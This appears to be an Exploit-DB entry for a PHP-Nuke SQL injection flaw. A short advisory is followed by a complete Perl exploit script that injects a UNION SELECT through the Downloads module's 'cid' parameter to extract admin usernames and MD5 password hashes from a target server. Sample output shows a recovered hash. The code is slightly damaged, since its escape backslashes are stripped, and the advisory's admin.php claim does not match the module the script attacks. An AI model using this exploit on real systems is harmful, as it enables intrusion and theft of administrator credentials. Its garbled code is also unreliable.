https://www.exploit-db.com/exploits/23237

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/8798/info

It has been reported that PHP-Nuke is prone to a SQL injection vulnerability that may allow a remote attacker to inject malicious SQL syntax into database queries. The issue is said to occur within the admin.php file, specifically when authenticating to a server.

The cause of this problem is due to insufficient sanitization of user-supplied data. An attacker may be able to exploit this issue to influence SQL query logic. Successful exploitation may disclose sensitive information about the underlying database to an attacker, which may be used to launch further attacks against a vulnerable system.

PHP-Nuke version 6.6 has been reported to be prone to this issue, however other versions may be affected as well. 

#!/usr/bin/perl -w
use IO::Socket;
########################################
## THIS CODE PUBLIC NOW  =)))         ##
########################################
## __________               ___ ___   ##
## ______   __ __  ______/   |     ##
##  |       _/  |  /  ___/    _     ##
##  |    |     |  /___ \         / ##
##  |____|_  /____//____  >___|_  /  ##
##         /           /       /   ##
########################################
## based on 'cid' sql injection vuln
## in Download module, more info about
## this vuln u can see here:
## http://rst.void.ru/texts/advisory10.htm
########################################
## work only on mysql version > 4.0
########################################
## tested on PHP-Nuke versions: 6.9, 6.0, 6.5
## C:>r57phpnuke.pl 127.0.0.1 /phpnuke/ admin
##
## server : 127.0.0.1
## folder : /phpnuke/
## aid    : admin
##
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] success
## [~] wait for reply...
## [+] w00t...
## [+] USER: admin
## [+] MD5 HASH: 5f4dcc3b5aa765d61d8327deb882cf99
##
########################################

if (@ARGV < 3)
{
print "################################################################################n";
print " r57nuke-cid.pl - PHP-NUKE 'cid' sql injection exploitn";
print " by RusH security team // www.rsteam.ru , http://rst.void.run";
print " coded by 1dt.w0lf // [email protected] // 17.09.2003n";
print "################################################################################n";
print " Usage:n";
print " r57nuke-cid.pl <host> </folder/> <aid>n";
print "n";
print " <host> - host for attackn";
print " </folder/> - PHP-nuke folder ( /phpnuke/ , /nuke/ or / for no folder )n";
print " <aid> - user aid , nick ( admin , blabla )n";
print "################################################################################";
exit();
}

$server = $ARGV[0];
$folder = $ARGV[1];
$aid = $ARGV[2];

print "n";
print "server : $servern";
print "folder : $foldern";
print "aid    : $aidn";
print "n";
$success = 0;
$path_download = "modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20--";
$GET = $folder . $path_download;
print "[~] prepare to connect...n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] connect failedn";
print "[+] connectedn";
print "[~] prepare to send data...n";
print $socket "GET $GET HTTP/1.1n";
print $socket "Host: $servern";
print $socket "Accept: */*n";
print $socket "Http-Referer: http://microsoft.comn";
print $socket "User-Agent: Internet Explorer 6.0n";
print $socket "Pragma: no-cachen";
print $socket "Cache-Control: no-cachen";
print $socket "Connection: closenn";
print "[+] successn";
print "[~] wait for reply...n";
while ($answer = <$socket>)
{
 #print "$answer";
 if ($answer=~/(&cid=)(w)("><b>)($aid)(</b></a></font>)(.{0,20})(<font class="content">)(.{32})(</font>)/)
 {
 $success = 1;
 print "[+] w00t...n";
 print "[+] USER: $1 n[+] MD5 HASH: $6n";
 }
}
if ($success == 0) { print "[-] exploit failed =(n"; }